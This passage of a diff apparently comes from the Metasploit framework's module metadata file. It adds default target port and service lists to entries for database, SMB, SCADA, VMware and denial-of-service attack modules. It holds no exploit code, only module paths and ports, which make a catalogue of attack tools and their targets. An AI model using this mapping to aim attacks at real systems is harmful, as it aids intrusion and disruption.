"/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb", @@ -3223,6 +4556,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb", @@ -3252,6 +4599,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb", @@ -3281,6 +4643,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_exec.rb", @@ -3315,6 +4691,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb", @@ -3344,6 +4734,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_idf.rb", @@ -3373,6 +4777,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb", @@ -3403,6 +4821,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb", @@ -3433,6 +4866,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_sql.rb", @@ -3462,6 +4909,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/mssql/mssql_sql_file.rb", @@ -3491,6 +4952,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mysql/mysql_enum.rb", @@ -3520,6 +4987,12 @@ "platform": "", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/mysql/mysql_sql.rb", @@ -3549,6 +5022,12 @@ "platform": "", "arch": "", "rport": 5351, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/natpmp/natpmp_map.rb", @@ -3580,6 +5059,12 @@ "platform": "", "arch": "", "rport": 137, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/netbios/netbios_spoof.rb", @@ -3613,6 +5098,21 @@ "platform": "", "arch": "", "rport": 26122, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/officescan/tmlisten_traversal.rb", @@ -3642,6 +5142,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb", @@ -3672,6 +5178,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/admin/oracle/oracle_login.rb", @@ -3701,6 +5213,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/oracle/oracle_sql.rb", @@ -3730,6 +5248,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/oraenum.rb", @@ -3762,6 +5286,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/oracle/osb_execqr.rb", @@ -3796,6 +5335,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/osb_execqr2.rb", @@ -3827,6 +5381,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/osb_execqr3.rb", @@ -3856,6 +5425,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb", @@ -3885,6 +5460,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb", @@ -3915,6 +5496,12 @@ "platform": "", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/sid_brute.rb", @@ -3944,6 +5531,12 @@ "platform": "", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/oracle/tnscmd.rb", @@ -3974,6 +5567,12 @@ "platform": "", "arch": "", "rport": 109, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/pop2/uw_fileretrieval.rb", @@ -4003,6 +5602,12 @@ "platform": "", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/postgres/postgres_readfile.rb", @@ -4032,6 +5637,12 @@ "platform": "", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/postgres/postgres_sql.rb", @@ -4064,6 +5675,21 @@ "platform": "", "arch": "", "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb", @@ -4093,6 +5719,22 @@ "platform": "", "arch": "", "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb", @@ -4127,6 +5769,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb", @@ -4160,6 +5817,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb", @@ -4190,6 +5853,12 @@ "platform": "", "arch": "", "rport": 502, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/scada/modicon_command.rb", @@ -4220,6 +5889,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/scada/modicon_password_recovery.rb", @@ -4250,6 +5926,12 @@ "platform": "", "arch": "", "rport": 502, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/scada/modicon_stux_transfer.rb", @@ -4284,6 +5966,12 @@ "platform": "", "arch": "", "rport": 4800, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/scada/moxa_credentials_recovery.rb", @@ -4315,6 +6003,12 @@ "platform": "", "arch": "", "rport": 44818, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/scada/multi_cip_command.rb", @@ -4345,6 +6039,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/scada/phoenix_command.rb", @@ -4375,6 +6075,12 @@ "platform": "", "arch": "", "rport": 20111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-07-08 19:00:11 +0000", "path": "/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb", @@ -4406,6 +6112,12 @@ "platform": "", "arch": "", "rport": 5168, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/serverprotect/file.rb", @@ -4436,6 +6148,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/admin/smb/check_dir_file.rb", @@ -4465,6 +6185,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/smb/delete_file.rb", @@ -4494,6 +6222,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-05-07 00:13:11 +0000", "path": "/modules/auxiliary/admin/smb/download_file.rb", @@ -4524,6 +6260,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/smb/list_directory.rb", @@ -4562,6 +6306,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-08-27 13:11:22 +0000", "path": "/modules/auxiliary/admin/smb/ms17_010_command.rb", @@ -4601,6 +6353,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-04-27 20:58:25 +0000", "path": "/modules/auxiliary/admin/smb/psexec_command.rb", @@ -4631,6 +6391,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-08-01 22:39:14 +0000", "path": "/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb", @@ -4663,6 +6431,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/admin/smb/samba_symlink_traversal.rb", @@ -4692,6 +6468,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-05-07 00:13:11 +0000", "path": "/modules/auxiliary/admin/smb/upload_file.rb", @@ -4725,6 +6509,12 @@ "platform": "", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb", @@ -4755,6 +6545,12 @@ "platform": "", "arch": "", "rport": 1025, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-13 13:09:01 +0000", "path": "/modules/auxiliary/admin/teradata/teradata_odbc_sql.py", @@ -4788,6 +6584,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/tftp/tftp_transfer_util.rb", @@ -4820,6 +6622,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/tikiwiki/tikidblib.rb", @@ -4850,6 +6667,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/upnp/soap_portmapping.rb", @@ -4879,6 +6711,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vmware/poweroff_vm.rb", @@ -4908,6 +6755,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vmware/poweron_vm.rb", @@ -4937,6 +6799,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vmware/tag_vm.rb", @@ -4966,6 +6843,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb", @@ -4999,6 +6891,12 @@ "platform": "", "arch": "", "rport": 5900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb", @@ -5030,6 +6928,12 @@ "platform": "", "arch": "", "rport": 17185, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb", @@ -5061,6 +6965,12 @@ "platform": "", "arch": "", "rport": 17185, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb", @@ -5092,6 +7002,12 @@ "platform": "", "arch": "", "rport": 17185, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb", @@ -5123,6 +7039,12 @@ "platform": "", "arch": "", "rport": 17185, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb", @@ -5157,6 +7079,21 @@ "platform": "", "arch": "", "rport": 10000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb", @@ -5190,6 +7127,21 @@ "platform": "", "arch": "", "rport": 10000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/webmin/file_disclosure.rb", @@ -5222,6 +7174,12 @@ "platform": "", "arch": "", "rport": 10001, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/admin/zend/java_bridge.rb", @@ -5252,6 +7210,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-13 12:09:58 +0000", "path": "/modules/auxiliary/analyze/jtr_aix.rb", @@ -5281,6 +7245,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-13 12:09:58 +0000", "path": "/modules/auxiliary/analyze/jtr_crack_fast.rb", @@ -5311,6 +7281,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-13 12:09:58 +0000", "path": "/modules/auxiliary/analyze/jtr_linux.rb", @@ -5341,6 +7317,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-13 12:09:58 +0000", "path": "/modules/auxiliary/analyze/jtr_mssql_fast.rb", @@ -5371,6 +7353,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-13 12:09:58 +0000", "path": "/modules/auxiliary/analyze/jtr_mysql_fast.rb", @@ -5401,6 +7389,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-13 12:09:58 +0000", "path": "/modules/auxiliary/analyze/jtr_oracle_fast.rb", @@ -5430,6 +7424,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-06-13 12:09:58 +0000", "path": "/modules/auxiliary/analyze/jtr_postgres_fast.rb", @@ -5461,6 +7461,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/bnat/bnat_router.rb", @@ -5492,6 +7498,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/bnat/bnat_scan.rb", @@ -5521,6 +7533,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-09-11 18:30:34 +0000", "path": "/modules/auxiliary/client/hwbridge/connect.rb", @@ -5550,6 +7577,12 @@ "platform": "", "arch": "", "rport": 2404, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-03 20:13:48 +0000", "path": "/modules/auxiliary/client/iec104/iec104.rb", @@ -5579,6 +7612,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/client/mms/send_mms.rb", @@ -5608,6 +7647,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/client/sms/send_text.rb", @@ -5637,6 +7682,18 @@ "platform": "", "arch": "", "rport": "25", + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/client/smtp/emailer.rb", @@ -5666,6 +7723,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/crawler/msfcrawler.rb", @@ -5695,6 +7758,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/docx/word_unc_injector.rb", @@ -5726,6 +7795,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/android/android_stock_browser_iframe.rb", @@ -5757,6 +7832,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-24 17:10:13 +0000", "path": "/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb", @@ -5788,6 +7869,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb", @@ -5820,6 +7907,12 @@ "platform": "", "arch": "", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/cisco/ios_telnet_rocem.rb", @@ -5852,6 +7945,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb", @@ -5885,6 +7984,12 @@ "platform": "", "arch": "", "rport": 53, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/dns/bind_tkey.rb", @@ -5918,6 +8023,12 @@ "platform": "", "arch": "", "rport": 53, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 10:41:10 +0000", "path": "/modules/auxiliary/dos/dns/bind_tsig.rb", @@ -5949,6 +8060,12 @@ "platform": "", "arch": "", "rport": 2049, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb", @@ -5981,6 +8098,12 @@ "platform": "", "arch": "", "rport": 1530, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/hp/data_protector_rds.rb", @@ -6012,6 +8135,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/http/3com_superstack_switch.rb", @@ -6044,6 +8173,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb", @@ -6080,6 +8224,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/apache_mod_isapi.rb", @@ -6114,6 +8264,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/apache_range_dos.rb", @@ -6147,6 +8312,12 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb", @@ -6178,6 +8349,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-01-24 20:54:21 +0000", "path": "/modules/auxiliary/dos/http/brother_debut_dos.rb", @@ -6208,6 +8394,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/canon_wireless_printer.rb", @@ -6240,6 +8441,12 @@ "platform": "", "arch": "", "rport": 1311, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/dos/http/dell_openmanage_post.rb", @@ -6271,6 +8478,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb", @@ -6301,6 +8523,12 @@ 